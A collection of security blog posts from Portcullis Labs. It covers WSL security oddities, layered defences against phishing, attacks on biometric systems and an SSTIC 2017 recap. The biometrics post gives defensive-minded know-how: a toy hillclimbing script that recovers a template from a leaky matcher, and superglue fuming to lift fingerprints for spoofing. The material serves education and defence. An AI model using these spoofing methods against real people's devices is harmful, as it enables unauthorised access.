So what does the “kernel” version look like? Well, at the point I examined it:

x@DESKTOP-L4857K3:~$ uname -a
Linux DESKTOP-L4857K3 3.4.0+ #1 PREEMPT Thu Aug 1 17:06:05 CST 2013 x86_64 x86_64 x86_64 GNU/Linux

This version of the Linux kernel should be vulnerable to Dirty COW, so what of it? It doesn't work, which again isn't a huge surprise. As Alex has alluded to, there is quite a substantial amount of mapping going on to implement the Linux system calls on Windows, and whilst they should be API compatible, the implementations between a real Linux kernel and what WSL gives you may be quite different.

This does however bring up the first critical point: there is no relationship between the patches supplied as part of Windows Update and what goes on with WSL. If you don't patch the Ubuntu userland regularly, you'll still be vulnerable to a whole plethora of Ubuntu (userland) vulnerabilities.

Memory corruption mitigations

Some Linux mitigations are in play however (as they would be on any real Ubuntu system) as can be seen with checksec.sh:

  • System-wide ASLR (kernel.randomize_va_space): On (Setting: 2)
  • Does the CPU support NX: Yes

And of course binaries are compiled with whatever Ubuntu hardening is currently supported:

	COMMAND    PID RELRO             STACK CANARY           NX/PaX        PIE
	  init      1 Full RELRO        Canary found           NX enabled    Dynamic Shared Object
	  sudo     14 Partial RELRO     Canary found           NX enabled    Dynamic Shared Object
	    su     15 Partial RELRO     Canary found           NX enabled    No PIE
	  bash     16 Partial RELRO     Canary found           NX enabled    No PIE
	  bash      2 Partial RELRO     Canary found           NX enabled    No PIE

Shared memory

So what does WSL look like more generally? Well, since I've had some fun with shared memory in the past, I wondered how this was implemented. It turns out that it's not:

root@DESKTOP-L4857K3:~# ipcs

kernel not configured for shared memory

kernel not configured for semaphores

kernel not configured for message queues

Whether this will have any security implications is difficult to say, but at the very least it may stop certain applications from working. Other applications may revert to using other, less well tested IPC mechanisms, which may expose security issues along the way.

Debugging

Moving on, how about debugging something? A simple tool which exercises the ptrace() system call is strace. Here's what happens when strace is run on a normal process:

root@DESKTOP-L4857K3:/sys# strace -f printf "test" 2>&1 | head -n 5
execve("/usr/bin/printf", ["printf", "test"], [/* 15 vars */]) = 0
brk(0)                                  = 0xa9d000
...

However you can’t strace PID 1 (as would have been possible on real Linux), instead ptrace() returns an error: “Operation not permitted”.

File systems

Whilst /mnt doesn't show up as a different file system, /mnt/c is actually used to map the underlying Windows system disk. This is immediately peculiar, since it is mapped with permissions of 0777 (world readable and world writable, amongst others). Moreover, any files created under it are created with an owner of root. You'd think this might be a problem, but from what I've seen so far, assuming the Windows file permissions are set right, then (because everything, even setUID processes, runs as you from Windows' perspective) you won't be able to access anything inappropriate (think SAM etc.). It. Just. Looks. Weird.

Furthermore, the way that WSL implements umasks is also an oddity: umask doesn't work on all file system types, in particular the aforementioned /mnt/c. Observe the following:

root@DESKTOP-L4857K3:/# umask 666
root@DESKTOP-L4857K3:/# touch foo
root@DESKTOP-L4857K3:/# ls -la foo
---------- 1 root root 0 Mar 28 23:10 foo
root@DESKTOP-L4857K3:~# rm foo
root@DESKTOP-L4857K3:~# cd /mnt/c/Users/x/
root@DESKTOP-L4857K3:/mnt/c/Users/x# touch foo
root@DESKTOP-L4857K3:/mnt/c/Users/x# ls -la foo
-rwxrwxrwx 1 root root 0 Mar 28 23:10 foo

Umask is honoured in the first location but not the second (a umask of 0666 should mean that files are created with no permissions). Whilst there's a fundamental Windows reason why this is the case, there is nothing to indicate this to the Ubuntu instance's userland, and thus files created within your home directory might be created with undesirable permissions. Microsoft are tracking this on GitHub as issue 352.
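The behaviour the Ubuntu userland expects, and which /mnt/c does not honour, is a simple calculation. This is a sketch of POSIX semantics, not of WSL's actual implementation:

```python
def expected_mode(requested: int, umask: int) -> int:
    """POSIX semantics: the umask bits are cleared from the requested mode."""
    return requested & ~umask

# touch requests mode 0666; a umask of 0666 should therefore leave no
# permission bits set, matching the first listing above but not /mnt/c.
print(oct(expected_mode(0o666, 0o666)))  # 0o0
print(oct(expected_mode(0o666, 0o022)))  # 0o644 (a typical default umask)
```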

Authentication

Unlike on a real Ubuntu system, there's no terminal-level authentication (whilst user accounts within the Ubuntu instance do have passwords, they're not needed unless you want to access the system remotely or gain root privileges via sudo). Moreover, from Windows' perspective, there is no difference between UID 0 and UID 1000. You can start a terminal and then use sudo to elevate your privileges and Windows will be none the wiser (Linux capabilities aren't mapped onto Windows user rights or special tokens). That might mean that users won't care too much about their Ubuntu instance's passwords, but as you can imagine, with no password policy enforcement, users might be tempted to reuse their Windows passwords.

I should also note that whilst sudo prompts for a password on each new bash.exe/conhost.exe pair hosting a terminal, if you authenticate to sudo, close the terminal and then reopen it, your sudo ticket may still be valid. This requires exact co-ordination, as sudo sessions are tracked by PID; however, the first terminal opened will always have a Linux bash process with a PID of 2, which may well be blessed from a previous sudo session.

Privileges

Finally, as per issue 561, because everything runs as you from Windows' perspective, the only way to successfully execute ping (which requires a raw ICMP socket on Linux) is to run bash.exe in elevated mode (as Administrator). This, despite the fact that a non-elevated user can quite happily execute ping on the Windows host. WSL doesn't even implement the concept of root in any real sense, let alone implement the necessary Linux syscalls to support capabilities in any useful fashion. This in turn means that everything else spawned from the elevated shell also runs with Windows administrative privileges. For comparison, here's what the new branches of your process tree will look like:

  • wininit.exe (runs as SYSTEM):
    • services.exe (runs as SYSTEM):
      • svchost.exe (runs as SYSTEM):
        • RuntimeBroker.exe (runs as your user, disabled privileges, not elevated):
          • bash.exe (runs as your user, disabled privileges, elevated):
            • conhost.exe (runs as your user, disabled privileges, elevated)

The first contains the Windows bash.exe instance which hosts your new terminal, whilst the second contains the Linux process tree:

  • svchost.exe (runs as SYSTEM):
    • init (runs as your user, no disabled privileges, locked into a job, elevated):
      • bash (runs as your user, disabled privileges, locked into a job, break away set to true, elevated):
        • sudo (runs as your user, disabled privileges, locked into a job, break away set to true, elevated):
          • ping (runs as your user, disabled privileges, locked into a job, break away set to true, elevated)

Microsoft’s stock answer is that the Ubuntu instance (or rather the bash.exe instance hosting the terminal and accompanying lxss.sys kernel implementation) is locked down, effectively sandboxed by a combination of Windows DACLs, the concept of jobs (touched upon at the start and akin to Linux cgroups) and syscall mapping that effectively uses lxss.sys to proxy most syscalls onto their corresponding NT kernel implementation.

Conclusion

The design of WSL seems to be relatively robust, if slightly odd; however, time will tell, particularly if offensive teams pick up the whiff of a new opportunity. If nothing else, take this article as a reminder that WSL should not be considered a security boundary and that it will remain unmanaged irrespective of how you administer your Windows hosts.

The post Exploring Windows Subsystem for Linux appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/exploring-windows-subsystem-for-linux/feed/ 0
A study in scarlet https://labs.portcullis.co.uk/blog/a-study-in-scarlet/ https://labs.portcullis.co.uk/blog/a-study-in-scarlet/#comments Thu, 20 Jul 2017 12:28:58 +0000 https://labs.portcullis.co.uk/?p=5917 In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large […]

The post A study in scarlet appeared first on Portcullis Labs.

]]>
In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large quantity of them began with a phishing attack.

Generally speaking, phishing is a social engineering technique that involves sending fraudulent emails to individuals in an attempt to coerce them into providing confidential information or network access. Spear phishing is a more targeted form of this, where attackers will target specific individuals within an organisation and use information gathered from publicly available resources, such as social media, to make the malicious emails seem more genuine. This attack technique is very effective, with previous research showing that victims are up to 4.5 times more likely to believe the contents of targeted emails. Additionally, targeting specific individuals with more access within an organisation, such as managers or system administrators, gives the attacker a greater chance of finding sensitive information than that provided by standard phishing.

The best defence against phishing attacks is to have employees that are aware of the threat and the methods of identifying them. That being said, it’s important to support your employees in this effort, minimising risk and the potential for human error, which is why employers should be doing everything they can to ensure that the emails do not reach their targets and, when they do, that they are easy to identify and report. This can be achieved by looking at the cyber kill chain, as documented by Lockheed Martin, and implementing sensible security controls at each of the stages that relate specifically to a phishing attack.

Delivery

The first part of the cyber kill chain where we can actively identify these attacks is at the delivery stage – when a malicious email hits the external mail server of an organisation. The following security controls can be put in place at this stage of an attack to identify and mitigate the majority of phishing attacks.

Mail content scanning

The most obvious place to search for indicators of a phishing attempt is the content of the emails themselves. By analysing information gathered about common attacks used by malicious actors, it is possible to identify potential phishing attacks before they reach the intended target. The contents of these emails can then be modified to make it easier for users to identify them.

As attackers use phishing as a method of gaining unauthorised access to systems or data, a common attack vector is to include a hyperlink to a web application that they control. Modern mail clients capable of rendering HTML emails make this attack method even more effective, as attackers are able to change the text that is displayed to the user in place of the hyperlink. To help the user identify the threat and limit the risk of this method of attack, hyperlinks should be rewritten to display to the user where their browser will take them if they click on the link.
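A minimal sketch of such a link rewrite follows. This is a naive regular-expression pass over an HTML mail body; a real mail gateway would use a proper HTML parser, and the function name is purely illustrative:

```python
import re

def expose_links(html: str) -> str:
    """Append each link's real target after its display text."""
    return re.sub(
        r'<a\s+href="([^"]+)"[^>]*>(.*?)</a>',
        r'<a href="\1">\2 [\1]</a>',
        html,
        flags=re.IGNORECASE | re.DOTALL,
    )

print(expose_links('<a href="http://evil.example">Your bank</a>'))
# <a href="http://evil.example">Your bank [http://evil.example]</a>
```

The user now sees the true destination next to the friendly link text, making a mismatch immediately visible.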

As phishing attempts will generally come from a network location external to their intended targets, another very simple but effective method of improving a user’s likelihood of identifying a phishing attack is the addition of a warning to the email, stating that it is from an external user. Users seeing that emails have come from an external location are much more likely to exercise caution when following hyperlinks.

Attachments

Malicious attachments sent via phishing email are a very real and dangerous threat as, at worst, they could allow an attacker to bypass all external protections and provide them with direct access to a company's internal network. The most secure method to avoid this threat would be to block all email attachments coming into a company; however, for the majority of businesses this is not practical and would severely limit their ability to communicate with clients/third parties. The following security controls can help to mitigate the potential damage that could be caused by malicious attachments:

  • File rewrite – a number of security solutions on the market are able to convert files into a safe format, for example, rewriting a Microsoft Docx file into a PDF so that no Macros can be executed
  • Moderator review – One very effective method of mitigating this threat is to hold all emails from external addresses that contain attachments in a quarantine system until they have undergone administrator review. This will allow them to examine the contents of the emails to determine whether or not they are malicious
  • Password protected attachments – As security solutions have no feasible way of decrypting password protected files, there is no way of automatically validating whether or not their content is malicious. Due to this, it is important to make sure they are either blocked from entering your organisation or, if there is a business requirement for such attachments, at a minimum they should undergo sandboxing or moderator review

Domain names

A common attack technique used to trick users into providing sensitive information is to use a domain that is close to a company’s legitimate domain. In order to counter this type of attack, security solutions can be employed to review how similar a sending domain is to the company’s legitimate domain, blocking emails from all domains that are above a certain level of similarity.
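One common way to score that similarity is edit (Levenshtein) distance. The sketch below is illustrative (the threshold of 2 and the function names are assumptions, not any particular product's implementation):

```python
def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # deletion
                           cur[j - 1] + 1,               # insertion
                           prev[j - 1] + (ca != cb)))    # substitution
        prev = cur
    return prev[-1]

def looks_like(sender: str, legit: str, threshold: int = 2) -> bool:
    """Flag sending domains within a small edit distance of the legitimate one."""
    return 0 < levenshtein(sender, legit) <= threshold

print(looks_like("examp1e.com", "example.com"))  # True: one character swapped
```

A gateway would block or quarantine mail from any domain the check flags, while leaving the legitimate domain itself (distance zero) alone.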

Another attack technique that has been discussed a large amount recently is the use of Internationalised Domain Names (IDN). IDNs are domain names that contain at least one character that is not within the normal ASCII character set. In order to facilitate this, domains can be registered as specially formatted ASCII strings, which are preceded by the characters “xn--”. This representation is what is actually registered with domain providers and is called Punycode. Using IDNs, attackers can register domains that look very similar to legitimate sites by changing ASCII characters for Unicode characters (e.g. www.goógle.com could be registered using the Punycode www.xn--gogle-1ta.com). As these IDN domains are actually registered using the Punycode for the domain name, mitigating the threat of this attack technique can be achieved by blocking all domain names that begin with the characters “xn--”.
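Python's built-in idna codec makes this check easy to sketch (the lookalike domain below is the article's own example; the function name is illustrative):

```python
def is_idn(domain: str) -> bool:
    """True if the domain's ASCII (Punycode) form contains an xn-- label."""
    return b"xn--" in domain.encode("idna")

print(is_idn("www.goógle.com"))  # True: encodes to a Punycode xn-- label
print(is_idn("www.google.com"))  # False: plain ASCII domain
```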

A further way of using a domain to identify malicious activity is to analyse what it appears to be used for. A number of security solutions on the market assign categories to domains, usually based on analysis of the services running on the systems (e.g. the content that is hosted on a web server). Using these solutions, it is also possible to report domains that have been identified as being used in phishing or other malicious activities. As the majority of these solutions operate using a cloud based central server, once a domain has been marked as malicious it will be impractical for attackers to use it in further attacks. Additionally, as attackers are unlikely to want to have their personal details registered to accounts for use in these services, it is likely that they will be unable to have their domains categorised when they set up their phishing. Blocking emails from domains that are not yet categorised can be just as effective at ensuring that phishing attempts do not reach their target.

Email validation

The wide range of open source software available to us makes it simple to set up and use a mail server for a domain of our choosing. This, however, provides attackers with the opportunity to send emails as if they were coming from a legitimate site – name@yourcompanynamehere.com for example. A number of technologies are available that will help to ensure that attackers are not able to spoof emails in this way:

  • Sender Policy Framework (SPF) – SPF is an email validation system which allows domain administrators to define the hosts that are allowed to send emails for their domain, through the use of a specially formatted DNS TXT record:
An example SPF record entry

  • Domain Keys Identified Mail (DKIM) – DKIM also uses a specially formatted DNS TXT record to validate the sender of an email, through the use of public/private key cryptography. The sending mail server adds a digital signature to outgoing emails, which can be verified using a public key that is published within the DNS record. This email validation method also provides data integrity for the emails, as any alterations made in transit will affect the validation of the digital signature.
An example DKIM signature in an email header

  • Domain-based Message Authentication, Reporting and Conformance (DMARC) – DMARC takes the two validation systems defined above and builds on them to create a much more robust system. It allows domain administrators to define which validation systems are to be used by mail servers for the domain (SPF, DKIM or both) and how mail servers should handle emails that do not pass the validation process.

By utilising these security controls and ensuring that our receiving mail server is checking the DNS records against the information in emails, we are able to ensure that attackers are unable to spoof emails from legitimate domains.
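By way of illustration, DNS TXT records implementing the three mechanisms for a hypothetical domain might look like the following (example.com, the selector name, the address range and the truncated key value are all assumptions for demonstration):

```
; SPF: only hosts in the listed network may send mail for the domain
example.com.                  IN TXT "v=spf1 ip4:192.0.2.0/24 -all"

; DKIM: public key published under an administrator-chosen selector
mail._domainkey.example.com.  IN TXT "v=DKIM1; k=rsa; p=MIGfMA0..."

; DMARC: reject mail failing SPF/DKIM validation and send aggregate reports
_dmarc.example.com.           IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"
```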

Malicious email reporting

If a malicious email does manage to get through all of the security controls at the perimeter, it is likely that at least some of its intended targets will fall for the scam. With that in mind, it is important that users have a method of notifying the people responsible for the security of your organisation that a malicious email has slipped through the net. Multiple solutions for this are available, such as the creation of a plugin for the company mail client or a mailing list that is used to report malicious emails. In tandem with this, policies and procedures should be put into place, which detail the process administrators and security staff should follow to inform employees that there is a phishing attack underway and how to identify it.

Mail client plugin

Exploitation, installation and command & control

A number of security controls can be used to mitigate the threat of phishing attacks across the next three stages of the cyber kill chain: Exploitation, Installation and Command & Control. If an attack has managed to progress this far along the cyber kill chain, it is imperative that it is identified and stopped to ensure that the attacker is not able to gain a foothold on an internal network.

End point protection

The most obvious method of blocking malicious applications from running on a target user’s system is to install an End Point Protection application. There are a number of options for this on the market, each of them able to detect and protect against millions of variants of malware and other unwanted applications. These products can help to stop an attack at either the Exploitation or Installation stages of the cyber kill chain by identifying and blocking malicious files/activity.

Outbound proxies

A common method of attack used in phishing attempts is to provide a link within the email that, when followed, will display a page asking for credentials or other sensitive information. In order to stop attackers using this technique, a network proxy can be used to block traffic to unknown domains. One possible solution to this issue is to only allow access to the top ranked sites, however, for some organisations this may not be practical. In situations such as this, a moderator/administrator should review any unknown domains to ensure that they are not malicious.

In addition to mitigating the threat of users disclosing sensitive information, these solutions can help to break the cyber kill chain at the installation and command & control (C2) stages, by stopping malware from using HTTP connections to unknown domains to download Remote Access Tools (RATs) or as a C2 channel.

Sandboxing

Sandboxing is the practice of using a system that is not connected to the live network (usually a virtual machine) to test files for malicious activity. As most attachments used in phishing attacks will have similar behaviour (e.g. connecting back to a command & control node) after being opened, sandboxing can be used to identify them within a safe environment to ensure that no live systems are affected. By using sandboxing technologies we can analyse the behaviour of files against indicators of malicious activity at all three of the stages of the kill chain.

Threat intelligence

While having all of the security solutions described above can help to identify and mitigate the threat of phishing attacks, the individuals behind the attacks are always developing and adapting their methodologies. Taking this into account, it is of utmost importance that the indicators of attack that we are looking for evolve with them. By feeding any information gathered from previous attacks into cloud-based threat intelligence platforms, the security community’s understanding of how attackers are operating will grow, which will in turn improve our ability to stop them.

Summary

While the threat of phishing attacks and the damage they can do is significant, both financially and to a company’s reputation, by looking at the timeline of these attacks it is possible to identify many security controls that can be used to mitigate them. By utilising these controls, through a defence-in-depth approach to security, we are able to limit the number of malicious emails that reach their targeted users. Furthermore, by using information about recognised indicators of attack, we are able to alter the contents of emails to assist users in the identification of emails and content that could potentially cause a security breach.

The post A study in scarlet appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/a-study-in-scarlet/feed/ 0
Biometrics: Forever the “next big thing” https://labs.portcullis.co.uk/blog/biometrics-forever-the-next-big-thing/ https://labs.portcullis.co.uk/blog/biometrics-forever-the-next-big-thing/#comments Thu, 06 Jul 2017 10:08:30 +0000 https://labs.portcullis.co.uk/?p=5806 It’s not every day we get to assess biometric systems from a security perspective, they are still somewhat esoteric and testing them doesn’t quite fit with the usual slew of things that come along with being a security consultant. Recent engagements reminded us of just how interesting this facet of the industry can be and […]

The post Biometrics: Forever the “next big thing” appeared first on Portcullis Labs.

]]>
It’s not every day we get to assess biometric systems from a security perspective, they are still somewhat esoteric and testing them doesn’t quite fit with the usual slew of things that come along with being a security consultant. Recent engagements reminded us of just how interesting this facet of the industry can be and so we decided to write up a little something around biometrics. This article will cover some of the history and the basics of biometrics and some of the biometric-centric attacks you may come across…

Biometrics aren’t new

They have been around for, well, as long as we have. There is evidence that cavemen used to sign paintings with a handprint as a way to confirm authorship. Traders used to keep ledgers with physical descriptions of trade partners. Police started keeping “biometric databases” of criminals hundreds of years ago.

Even digital biometrics have been around for decades. Digitised systems, especially for voice, writing and fingerprints, started coming into being in the 1970s and 1980s, largely funded by government and law enforcement agencies such as the FBI.

Somewhere around the 1990s is when biometrics as we know them today came into form: fully digitised and automated systems, automatic facial recognition in CCTV, biometric passports, etc. Since then it has largely been about miniaturisation, increasing sensor/template accuracy and finding new, novel things to measure, such as ear biometrics – which I'm going to go out on a limb and say nobody needs or wants.

Recently, biometrics have started to make their way directly in to the lives of consumers on a larger scale, thanks to increasing adoption of fingerprint and facial/retina scanners amongst smartphone and laptop manufacturers.

But what happens when a user enrols their finger – or any other appendage – on a biometric device?

A pixelated finger (probably).

The biometric device makes an acquisition using whatever sensor is installed, for example a CCD or optical sensor like in a camera, a capacitance scanner, or even potentially an ultrasound scanner. This scan is then analysed for "interesting" features, or minutiae. These important bits of the biometric are isolated and saved in a binary template; the rest of the reading is generally discarded.

Of course, manufacturers have their own algorithms for creating templates and matching. But in general, each template boils down to something akin to coordinates. For template matching, a number of different comparison algorithms are used, with Hamming distances being the most common that I've seen. At a simple level, Hamming distances measure the differences between two equal-length strings (the presented templates).

To explain this a bit more clearly: when a user puts their finger on a fingerprint scanner, they don’t always put it in exactly the same place or at exactly the same angle. By using an algorithm such as Hamming distance to calculate the difference, a biometric device can judge the presented biometric on a number of different factors, such as the distances between each minutia detected and those of the stored templates.
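To make the idea concrete, here is a minimal Python sketch of threshold-based matching using a Hamming distance. The byte values and the threshold are invented purely for illustration – real devices use proprietary template formats and tuning:

```python
# Illustrative sketch only: real vendors use proprietary template formats
# and matching algorithms; the templates and threshold here are made up.

def hamming_distance(a: bytes, b: bytes) -> int:
    """Count the number of differing bits between two equal-length templates."""
    if len(a) != len(b):
        raise ValueError("templates must be the same length")
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

def matches(stored: bytes, presented: bytes, max_distance: int = 10) -> bool:
    """Accept the presented template if it is 'close enough' to the stored one."""
    return hamming_distance(stored, presented) <= max_distance

enrolled  = bytes.fromhex("a3f01c9b44e27d10")
same_user = bytes.fromhex("a3f01c9b44e27d12")   # slight sensor noise: 1 bit differs
imposter  = bytes.fromhex("5518e2c0937a0bd4")

print(matches(enrolled, same_user))  # True  – distance of 1 is within the threshold
print(matches(enrolled, imposter))   # False – distance of 39 is far outside it
```

The tolerance threshold is exactly why a presented biometric never has to be a perfect copy of the enrolled one – which also works in an attacker’s favour, as we’ll see below.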

But it’s not all about fingertips and eyeballs

A table showing common biometrics and their attributes

The above table is by no means a complete list of biometrics; it merely covers the ones people hear of or encounter the most. Nor is it 100% representative – it is meant as a general guideline.

Accuracy in the table is how unique to an individual the biometric – and therefore the scan – is. So, for example, hand geometry is not very accurate or unique: usually all that happens is the acquisition device takes a measurement of the key points of the hand (the tips and grooves of the fingers, and the width). Iris and retina are considered high accuracy because they are unique traits, even between identical twins, and relatively high-quality acquisitions can be made. Just to clarify: the iris is the nice colourful part at the front of the eye which controls the eye’s aperture, while the retina refers to the nerves near the back of the eye which collect that light – in biometrics, specifically the veins.

Security is how safe the biometric is in terms of its potential to be inadvertently “stolen”. So, for example, fingerprints aren’t very secure at all: people leave them all over the place, almost like leaving post-it notes with their passwords everywhere. The retina is the only one on this list considered high, because it is the only truly “internal” trait listed, so it isn’t something that can be seen or copied easily.

The final column is usability: how easy it is to actually use the system. Fingerprint scanners are easy – just plop the finger on the acquisition sensor and away you go. Iris and face require the user to stand still in front of a camera, so they are a bit more awkward. Retina is the most difficult, because it is an internal trait and hard to scan: the user has to place their eye right up to the sensor and have a relatively bright light shone into their eye. Not particularly pleasant.

Finger vein and palm vein scanning are two types of biometrics I haven’t listed here, but they are quite promising and gaining traction. Both offer a sensible alternative to fingerprints – they retain most of the usability of fingerprints while removing the weakness of relying on an external trait. I’d personally really like to see a smartphone with an IR-based palm vein reader on the back, but maybe I’m just a little bit crazy.

Attack vectors

Just as with any other system, biometrics expose a slew of network and local attack vectors: replaying old templates, modifying data in transit, modifying or stealing from the backend database, brute-force attacks and so on. The security industry knows these attacks all too well, and we also know how to defend against them. What we are more interested in are the attack vectors specific to biometrics: attacking the input device (sensor) and the templates themselves.

Over the years, a number of techniques for achieving a successful authentication illegitimately have come to light. We’ll cover a few of the more common ones below:

Reverse engineering

We’ll start with the templates themselves. Imagine that we have acquired a template somehow (i.e. we have compromised a database containing biometric templates) and now need to get past an actual biometric scanner.

At some point in time, it was thought that reverse engineering biometric templates back into a presentable appendage wasn’t possible. After all, templates are just a few bytes of data, which don’t contain enough information to reconstruct the original biometric from. In practice, this technique is essentially the biometric equivalent of “password cracking”.

As we already know, templates generally list the coordinates of the minutiae in a biometric. This means that the key information is realistically already there; it just needs to be worked out in terms of a mappable grid, with all the ‘uninteresting’ data then added back in so that the result resembles an actual trait.

This is something that sounds easier in theory than it is in practice; I’ve only ever seen it achieved successfully in lab environments.

A specific case-study that comes to mind is around iris reverse engineering, found in the “Handbook of Iris Recognition”.

The team used an open source system developed by Libor Masek to create an initial group of reconstructed irises, which were then tested against the system. The closest matches from the initial group were then combined, along with some new, randomly generated data. This was repeated until a match was found. In over 90% of cases the attack eventually succeeded.

Hillclimbing attacks

This class of attack is similar to a reverse engineering attack, except that the attacker starts without a template to work from. Instead, the attacker has to rely on the biometric system doing something stupid, such as returning the match percentage of any authentication attempt. Most security-conscious systems today do not do this, but there are still some edge cases and older devices which do.

Against a system which does not return data about how close the match was, the attacker would simply have to resort to brute force. Much like its password-cracking equivalent, it is just a matter of trying a large number of templates and comparing them against the real one. And just as with password brute-forcing, it is much easier to do with a stolen template than against a live system, which may have anti-automation features such as account lockouts, rate limiting, etc.
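As a sketch of the hillclimbing idea, assume a hypothetical matcher that leaks its match score – the flaw described above. The device, the 64-bit template format and the scoring function are all invented for illustration; the point is only that any leaked score turns guessing into a greedy search:

```python
# Hypothetical sketch: a badly designed matcher leaks how close each
# attempt was, so an attacker can flip one bit at a time and keep only
# the changes that improve the score.
import random

random.seed(7)
BITS = 64
SECRET = random.getrandbits(BITS)  # the enrolled template, unknown to the attacker

def leaky_score(attempt: int) -> float:
    """Returns the fraction of matching bits -- the information leak."""
    return (BITS - bin(attempt ^ SECRET).count("1")) / BITS

def hill_climb() -> int:
    guess = random.getrandbits(BITS)   # start from a random template
    best = leaky_score(guess)
    while best < 1.0:
        for bit in range(BITS):
            candidate = guess ^ (1 << bit)     # flip a single bit
            score = leaky_score(candidate)
            if score > best:                   # keep only improvements
                guess, best = candidate, score
    return guess

recovered = hill_climb()
print(recovered == SECRET)  # True: the leak lets us recover the template
```

With a per-bit leak like this, recovery takes on the order of 64 queries rather than the 2^64 attempts blind brute force would need – which is why modern systems return only a binary accept/reject.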

Spoofed physical biometrics

Spoofed biometrics get a large amount of attention compared to other methods, especially when it comes to fingerprints and creating replicas. So how easy is it to take someone’s fingerprint and produce a working model from it?

The short answer is that it is relatively easy to do with the right equipment and a good fingerprint to work off of.

Possibly the most well-known and widely used method is the one known as “cyanoacrylate [superglue] fuming”.

Cyanoacrylate, when it evaporates, has a remarkable tendency to be attracted to grease (i.e. latent fingerprints left on things) in humid environments. Once it settles on the grease it re-solidifies, leaving a nice rigid and clearly marked fingerprint where before there was only grease. These prints are much more durable and defined, which makes them easier to extract and create a spoofed print from.

Superglue fuming is actually remarkably easy to do: all that is required is a container to put the thing you want to extract a fingerprint from in (such as a box or small fish tank), along with a small amount of superglue on some foil. Usually a heat source under the superglue (to help it evaporate quicker) and a small cup of water (to aid with humidity) are also added, for extra efficiency. Then simply wait a while.

After the print has settled nicely, it is simply a matter of extracting and inverting it. There are many ways to do this, such as dental mould, high-resolution scans or even high-quality clear tape. Most professionals will attempt to further enhance a print at various stages using things such as fine powders, but this post is meant as an overview, not an in-depth guide on how to extract prints.

The image below shows all the basic materials required for fingerprint extraction and superglue fuming:

Superglue fuming

In addition to extracting latent prints, back in 2014 a speaker at CCC in Germany demonstrated that it is possible to spoof a fingerprint scanner on a smartphone starting with just a high-enough resolution photo of a person’s finger. To put this in a “worst-case” context: when you use fingerprints for authentication, not only are you potentially leaving copies of your unchangeable ‘password’ everywhere, you’re also carrying it around with you in plain sight.

Other biometrics

Voice-based biometrics are another area on the rise, especially as a way to ‘verify’ someone quickly and remotely (i.e. over the phone) – often touted as a way to reduce phone support overheads and costs via automation.

The primary attack vector here is the one you would expect: replay attacks. Recording someone enrolling or authenticating and then replaying the recording later is surprisingly easy to execute, and most voice biometric systems appear to have only limited or non-existent abilities to detect or prevent replays.

To put this in a more traditional ‘password’ context, it’s like saying your password out loud for everyone to hear every time you use it. It doesn’t take an exceptional amount of skill to place a recording device. Voice distinction is also a limiting factor in voice biometrics: imitating the speech pattern of others (mainly pitch, inflection of phonemes and cadence) is not hugely difficult with a bit of practice and thought.

Summary

The attacks described here are not all particularly mature, but they have not needed to be. Biometrics aren’t widely adopted and therefore are not a high-priority target. If there were real demand, we’d all keep biometric template cracking and reconstruction software on our machines.

Imagine a world where passwords were replaced by biometrics. Once a breach happens – and let’s be honest, sooner or later a breach always happens – you would spend the rest of your life wondering if it is game over for all your logins that use your finger (or whatever), and it would be out of your control. There is often a lot of grumbling about passwords, but at least passwords are easily changed should the worst happen. Get a password manager and the trouble of remembering them all largely goes away (I wish major OSes would ship with decent password managers, to get people into this habit).

Of course, there is the third major option amongst all this: “something you have” – access cards of varying types: RFID, NFC, even cards with PKI certificates. All have their pros and cons and are part of a larger debate which I won’t go into here. Ultimately, the industry has already decided that multi-factor authentication is the way to go where security is prioritised. Biometrics fit into this as part of the “multi” – use them alongside something else. And no, I don’t mean alongside a username/ID, which is not private information, but an access token and/or a password.

The post Biometrics: Forever the “next big thing” appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/biometrics-forever-the-next-big-thing/feed/ 0
SSTIC 2017 wrap-up https://labs.portcullis.co.uk/blog/sstic-2017-wrap-up/ https://labs.portcullis.co.uk/blog/sstic-2017-wrap-up/#comments Tue, 27 Jun 2017 12:55:42 +0000 https://labs.portcullis.co.uk/?p=5838 This year, one member of the Portcullis team went to one of the biggest security events in France: SSTIC (Symposium sur la sécurité des technologies de l’information et des communications). This post will highlight the most interesting presentations. Many of the slides, articles and videos are available on the SSTIC web site, but they are […]

The post SSTIC 2017 wrap-up appeared first on Portcullis Labs.

]]>
This year, one member of the Portcullis team went to one of the biggest security events in France: SSTIC (Symposium sur la sécurité des technologies de l’information et des communications). This post will highlight the most interesting presentations. Many of the slides, articles and videos are available on the SSTIC web site, but they are mostly in French.

SSTIC is, along with La Nuit du Hack, one of the oldest security events in France; this year was the 15th edition. The event is based in Rennes (Brittany), a small town with lots of students and bars. For the record, there is a street in the city nicknamed “Thirsty Street” because the majority of the city’s bars are located there. The event took place over 3 days (7, 8 and 9 June) and welcomed around 600 security enthusiasts. There is only one track, with 29 presentations in different formats:

  • 11 Short talks: 15 min
  • 14 Regular talks: 30 min
  • 5 Guest talks: between 45 min and 1 hour

In addition, there are “rump sessions”, a sort of lightning talk with a maximum duration of 3 minutes. Why maximum? Because the audience is able to stop the presentation by applauding the speaker.

Here are some of our favourite talks delivered at this event:

Silo Administration (“Administration en Silo”)

This talk was presented by Aurélien Bordes, who works for ANSSI, the French equivalent of the NCSC. It was a very interesting talk showing how it is possible to harden your Windows domain in order to avoid a full compromise during an internal penetration test or an APT. The idea is to prevent attackers from performing lateral movement and obtaining domain admin rights in your Windows domain.

First, the speaker explained that a Windows domain can be divided into three levels:

  • RED: Administration resources (Active Directory, administrator workstations, etc.)
  • YELLOW: Business data and assets manipulating those data
  • GREEN: End-user workstations

